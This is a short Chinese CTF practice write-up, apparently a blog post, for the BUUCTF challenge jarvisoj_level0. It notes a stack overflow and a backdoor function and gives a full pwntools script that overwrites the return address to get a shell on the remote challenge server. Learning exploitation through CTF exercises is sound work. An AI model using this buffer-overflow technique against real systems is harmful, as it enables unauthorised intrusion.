buuctf-日常练习
shenghuo2
目录
警告
本文最后更新于 2023-02-01,文中内容可能已过时。
jarvisoj_level0
发现只开了NX
使用IDA反编译,发现有溢出点,也有后门函数
是个白给题,
from pwn import *
#p = process('./level0')
p = remote ('node4.buuoj.cn',26348)
binsh = 0x400596
payload = 'A'*0x88 + p64(binsh)
p.sendline(payload)
p.interactive()
